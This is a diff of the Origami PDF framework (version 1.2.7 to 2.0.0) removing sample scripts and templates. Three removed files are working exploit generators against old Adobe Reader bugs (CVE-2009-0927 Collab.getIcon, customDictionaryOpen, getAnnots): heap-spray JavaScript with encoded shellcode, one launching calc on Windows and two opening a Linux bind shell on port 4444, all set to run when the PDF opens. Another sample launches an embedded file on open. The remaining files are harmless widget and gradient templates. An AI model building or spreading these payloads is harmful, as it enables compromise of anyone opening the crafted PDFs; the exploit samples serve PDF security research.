origami 1.2.7 → 2.0.0

data/samples/exploits/cve-2009-0927-geticon.rb

@@ -1,65 +0,0 @@
-#!/usr/bin/env ruby 
-
-#
-# References:
-#    CVE 2009-0927
-#    http://www.securityfocus.com/bid/34169
-#    http://www.zerodayinitiative.com/advisories/ZDI-09-014/
-#
-#�Vulnerable: Adobe Reader and Adobe Acrobat Professional < 8.1.4
-#
-# This exploit / PoC spawns a calc on Windows.
-# 
-#
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-pdf = PDF.read(ARGV[0])
-
-jscript = %Q|
-function spary() {
-var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98\
-bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0\
-ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8\
-c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
-
-//shellcode = unescape("%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd");
-
-garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
-90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
-90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
-90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
-90%u9090%u9090%u9090") + shellcode;
-nopblock = unescape("%u9090%u9090");
-headersize = 10;
-acl = headersize+garbage.length;
-while (nopblock.length<acl) nopblock+=nopblock;
-fillblock = nopblock.substring(0, acl);
-block = nopblock.substring(0, nopblock.length-acl);
-while(block.length+acl<0x40000) block = block+block+fillblock;
-memory = new Array();
-for (i=0;i<180;i++) memory[i] = block + garbage;
-var buffersize = 4012;
-var buffer = Array(buffersize);
-for (i=0; i<buffersize; i++)
-{
-buffer[i] = unescape("%0a%0a%0a%0a");
-}
-
-Collab.getIcon(buffer+'_N.bundle');
-}
-spary();
-|
-
-exploit = Action::JavaScript Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode])
-pdf.pages.first.onOpen( exploit )
-
-pdf.save("#{File.basename($0, '.rb')}.pdf")
-

data/samples/exploits/exploit_customdictopen.rb

@@ -1,55 +0,0 @@
-#!/usr/bin/env ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-pdf = PDF.read(ARGV[0])
-
-jscript = %Q|
-//##############
-//Exploit made by Arr1val
-//Proved in adobe 9.1 and adobe 8.1.4 on linux
-//##############
-
-app.alert('start heap spray...');
-
-var memory;
-var nop = unescape("%u9090%u9090");
-var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444
-
-while(nop.length <= 0x10000/2) {
-    nop += nop;
-}
-
-nop = nop.substring(0,0x10000/2 - shellcode.length);
-
-memory = new Array();
-for (i=0; i<0x6ff0; i++) {
-    memory[i] = nop + shellcode;
-}
-
-//start exploit now
-start();
-
-function start()
-{
-	this.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141
-}
-
-//############################
-
-//# milw0rm.com [2009-04-29]
-|
-
-#exploit = Action::JavaScript Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode])
-exploit = Action::JavaScript Stream.new(jscript)
-pdf.onDocumentOpen( exploit )
-
-pdf.save("#{File.basename($0, '.rb')}.pdf")
-

data/samples/exploits/getannots.rb

@@ -1,69 +0,0 @@
-#!/usr/bin/env ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-pdf = PDF.read(ARGV[0])
-
-jscript = %Q|
-//##############
-//Exploit made by Arr1val
-//Proved in adobe 9.1 and adobe 8.1.4 on linux
-//
-//Steps:
-//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
-//- attach the following script to the OpenAction of the pdf.
-//##############
-
-app.alert('start heap spray...');
-
-
-var memory;
-var nop = unescape("%u9090%u9090"); //long nop will also force the address to go to 0x90909090 so 2 steps in one
-var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444
-
-while(nop.length <= 0x100000/2) {
-  nop += nop;
-}
-
-nop = nop.substring(0,0x100000/2 - shellcode.length);
-
-memory = new Array();
-for(i=0; i<0x3; i++) { //we should at least overwrite 0x90909090
-    memory[i] = nop + shellcode;
-}
-
-
-//start exploit now
-start();
-
-function start()
-{
-//    this.getAnnots(-134217728,-134217728,-134217728,-134217728);
-    app.alert("boom?");
-    this.getAnnots(-134217728,-134217729,-134217730,-134217731); //get control on EDI
-}
-
-
-//# milw0rm.com [2009-04-29]
-|
-
-#exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
-exploit = Action::JavaScript Stream.new(jscript)
-pdf.onDocumentOpen( exploit )
-
-
-annot = Annotation::Text.new
-annot.Contents =  "Hello world"
-annot.Rect = [ 512, 512, 660, 606]
-annot.F = Annotation::Flags::HIDDEN
-pdf.pages[0].add_annot( annot )
-
-pdf.save("#{File.basename($0, '.rb')}.pdf")
-

data/samples/flash/flash.rb

@@ -1,31 +0,0 @@
-#!/usr/bin/env ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-INPUTFILE = "helloworld.swf"
-OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
-
-puts "Now generating a new PDF file from scratch!"
-
-# Creating a new file
-pdf = PDF.new.append_page(page = Page.new)
-
-# Embedding the SWF file into the PDF.
-swf = pdf.attach_file(INPUTFILE)
-
-# Creating a Flash annotation on the page.
-annot = page.add_flash_application(swf, :windowed => true, :navigation_pane => true, :toolbar => true)
-
-# Setting the player position on the page.
-annot.Rect = Rectangle.new(204, 573, 403, 718)
-
-pdf.save(OUTPUTFILE)
-
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/javascript/attached.txt

@@ -1 +0,0 @@
-***THIS IS THE EMBEDDED FILE***

data/samples/javascript/js.rb

@@ -1,52 +0,0 @@
-#!/usr/bin/env ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-if defined?(PDF::JavaScript::Engine)
-
-  INPUTFILE = "attached.txt"
-
-  # Creating a new file
-  pdf = PDF.new
-
-  # Embedding the file into the PDF.
-  pdf.attach_file(INPUTFILE, 
-    :EmbeddedName => "README.txt", 
-    :Filter => :ASCIIHexDecode
-  )
-
-  # Example of JS payload
-  pdf.onDocumentOpen Action::JavaScript <<-JS
-    if ( app.viewerVersion == 8 )
-      eval("this.exportDataObject({cName:'README.txt', nLaunch:2});");
-    this.closeDoc();
-  JS
-  
-
-  # Tweaking the engine options
-  pdf.js_engine.options[:log_method_calls] = true
-  pdf.js_engine.options[:viewerVersion] = 8
-
-  # Hooking eval()
-  pdf.js_engine.hook 'eval' do |eval, expr|
-    puts "Hook: eval(#{expr.inspect})"
-    eval.call(expr) # calling the real eval method
-  end
-
-  # Example of inline JS evaluation
-  pdf.eval_js 'console.println(util.stringFromStream(this.getDataObjectContents("README.txt")))'
-
-  # Executes the string as a JS script
-  pdf.Catalog.OpenAction[:JS].eval_js
-
-else
-  puts "JavaScript support not found. You need to install therubyracer gem."
-end
-

data/templates/patterns.rb

@@ -1,66 +0,0 @@
-=begin
-
-= File
-	patterns.rb
-
-= Info
-	This file is part of Origami, PDF manipulation framework for Ruby
-	Copyright (C) 2010	Guillaume Delugré <guillaume@security-labs.org>
-	All right reserved.
-	
-  Origami is free software: you can redistribute it and/or modify
-  it under the terms of the GNU Lesser General Public License as published by
-  the Free Software Foundation, either version 3 of the License, or
-  (at your option) any later version.
-
-  Origami is distributed in the hope that it will be useful,
-  but WITHOUT ANY WARRANTY; without even the implied warranty of
-  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-  GNU Lesser General Public License for more details.
-
-  You should have received a copy of the GNU Lesser General Public License
-  along with Origami.  If not, see <http://www.gnu.org/licenses/>.
-
-=end
-
-module Origami
-
-  module Template
-
-    class AxialGradient < Graphics::Pattern::Shading::Axial
-
-      def initialize(from, to, color0, color1, coeff = 1)
-        super()
-
-        set_indirect(true)
-
-        x, y  = from
-        tx, ty = to
-
-        c0 = Graphics::Color.to_a(color0)
-        c1 = Graphics::Color.to_a(color1)
-
-        space = 
-        case c0.size
-          when 1 then Graphics::Color::Space::DEVICE_GRAY
-          when 3 then Graphics::Color::Space::DEVICE_RGB
-          when 4 then Graphics::Color::Space::DEVICE_CMYK
-        end
-
-        f = Function::Exponential.new
-        f.Domain = [ 0.0, 1.0 ]
-        f.N = coeff
-        f.C0, f.C1 = c0, c1
-
-        self.ColorSpace = space
-        self.Coords = [ x, y, tx, ty ]
-        self.Function = f
-        self.Extend = [ true, true ]
-
-      end
-
-    end
-
-  end
-
-end

data/templates/widgets.rb

@@ -1,173 +0,0 @@
-=begin
-
-= File
-	widgets.rb
-
-= Info
-	This file is part of Origami, PDF manipulation framework for Ruby
-	Copyright (C) 2010	Guillaume Delugré <guillaume@security-labs.org>
-	All right reserved.
-	
-  Origami is free software: you can redistribute it and/or modify
-  it under the terms of the GNU Lesser General Public License as published by
-  the Free Software Foundation, either version 3 of the License, or
-  (at your option) any later version.
-
-  Origami is distributed in the hope that it will be useful,
-  but WITHOUT ANY WARRANTY; without even the implied warranty of
-  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-  GNU Lesser General Public License for more details.
-
-  You should have received a copy of the GNU Lesser General Public License
-  along with Origami.  If not, see <http://www.gnu.org/licenses/>.
-
-=end
-
-module Origami
-
-  module Template
-
-    class Button < Annotation::Widget::PushButton  
-
-      def initialize(x,y,width,height, caption, id = nil)
-        super()
-
-        set_indirect(true)
-
-        self.H = Annotation::Widget::Highlight::INVERT
-        self.Rect = [ x, y, x+width, y+height ]
-        self.F = Annotation::Flags::PRINT
-        self.T = id
-
-        appstm = Annotation::AppearanceStream.new.setFilter(:FlateDecode)
-        appstm.BBox = [ 0, 0, width, height ]
-        appstm.Matrix = [ 1, 0, 0, 1, 0, 0 ]
-
-        appstm.draw_rectangle(0, 0, width, height, 
-          :fill => true, :stroke => false, :fill_color => Graphics::Color::RGB.new(0xE6, 0xE6, 0xFA))
-
-        appstm.draw_polygon([[1,1],[1,height-1],[width-1,height-1],[width-2,height-2],[2,height-2],[2,2]],
-          :fill => true, :stroke => false, :fill_color => Graphics::Color::GrayScale.new(1.0))
-
-        appstm.draw_polygon([[width-1,height-1],[width-1,1],[1,1],[2,2],[width-2,2],[width-2,height-2]],
-          :fill => true, :stroke => false, :fill_color => Graphics::Color::RGB.new(130, 130, 130))
-
-        appstm.draw_rectangle(0.5, 0.5, width-1, height-1,
-          :fill => false, :stroke => true, :stroke_color => Graphics::Color::GrayScale.new(0.0))
-
-        text_width = 4.75 * caption.length
-        appstm.write(caption,
-          :x => (width - text_width)/2, :y => height/2-5, :size => 10)
-
-        appstm.Resources = Resources.new
-        set_normal_appearance(appstm)
-      end
-
-    end
-
-    class Edit < Annotation::Widget::Text
-
-      def initialize(x,y,width,height, id)
-        super()
-
-        set_indirect(true)
-
-        self.Rect = [ x, y, x+width, y+height ]
-        self.F = Annotation::Flags::PRINT
-        self.T = id
-        self.DA = '/F1 12 Tf 0 g'
-        
-        appstm = Annotation::AppearanceStream.new.setFilter(:FlateDecode)
-        appstm.BBox = [ 0, 0, width, height ]
-        appstm.Matrix = [ 1, 0, 0, 1, 0, 0 ]
-
-        appstm.draw_rectangle(0, 0, width, height,
-          :fill => false, :stroke => true, :stroke_color => Graphics::Color::GrayScale.new(0.0))
-
-        appstm.draw_polygon([[1,1],[1,height-1],[width-1,height-1],[width-2,height-2],[2,height-2],[2,2]],
-          :fill => true, :stroke => false, :fill_color => Graphics::Color::RGB.new(130, 130, 130))
-
-        appstm.draw_polygon([[width-1,height-1],[width-1,1],[1,1],[2,2],[width-2,2],[width-2,height-2]],
-          :fill => true, :stroke => false, :fill_color => Graphics::Color::GrayScale.new(1.0))
-
-        appstm.draw_rectangle(0.5, 0.5, width-1, height-1,
-          :fill => false, :stroke => true, :stroke_color => Graphics::Color::GrayScale.new(0.0))
-
-        set_normal_appearance(appstm)
-      end
-
-    end
-
-    class MultiLineEdit < Edit
-
-      def initialize(x,y,width,height, id)
-        
-        super(x,y,width,height,id)
-
-        self.Ff ||= 0
-        self.Ff |= Annotation::Widget::Text::Flags::MULTILINE
-      end
-
-    end
-
-    class RichTextEdit < MultiLineEdit
-
-      def initialize(x,y,width,height, id)
-        
-        super(x,y,width,height,id)
-
-        self.F |= Annotation::Flags::READONLY
-        self.Ff |= (Annotation::Widget::Text::Flags::RICHTEXT | Field::Flags::READONLY)
-      end
-
-    end
-
-    class PasswordEdit < Edit
-
-      def initialize(x,y,width,height, id)
-        
-        super(x,y,width,height,id)
-
-        self.Ff ||= 0
-        self.Ff |= Annotation::Widget::Text::Flags::PASSWORD
-
-      end
-
-    end
-
-    class TextPanel < Annotation::FreeText
-
-      def initialize(x,y,width,height, id)
-        super()
-
-        set_indirect(true)
-
-        self.Rect = [ x, y, x+width, y+height ]
-        self.F = Annotation::Flags::PRINT
-        self.NM = id
-        self.DA = '/F1 12 Tf 0 g'
-        
-        appstm = Annotation::AppearanceStream.new.setFilter(:FlateDecode)
-        appstm.BBox = [ 0, 0, width, height ]
-        appstm.Matrix = [ 1, 0, 0, 1, 0, 0 ]
-
-        appstm.draw_rectangle(0, 0, width, height,
-          :fill => false, :stroke => true, :stroke_color => Graphics::Color::GrayScale.new(0.0))
-
-        appstm.draw_polygon([[1,1],[1,height-1],[width-1,height-1],[width-2,height-2],[2,height-2],[2,2]],
-          :fill => true, :stroke => false, :fill_color => Graphics::Color::RGB.new(130, 130, 130))
-
-        appstm.draw_polygon([[width-1,height-1],[width-1,1],[1,1],[2,2],[width-2,2],[width-2,height-2]],
-          :fill => true, :stroke => false, :fill_color => Graphics::Color::GrayScale.new(1.0))
-
-        appstm.draw_rectangle(0.5, 0.5, width-1, height-1,
-          :fill => false, :stroke => true, :stroke_color => Graphics::Color::GrayScale.new(0.0))
-
-        set_normal_appearance(appstm)
-      end
-
-    end
-
-  end
-
-end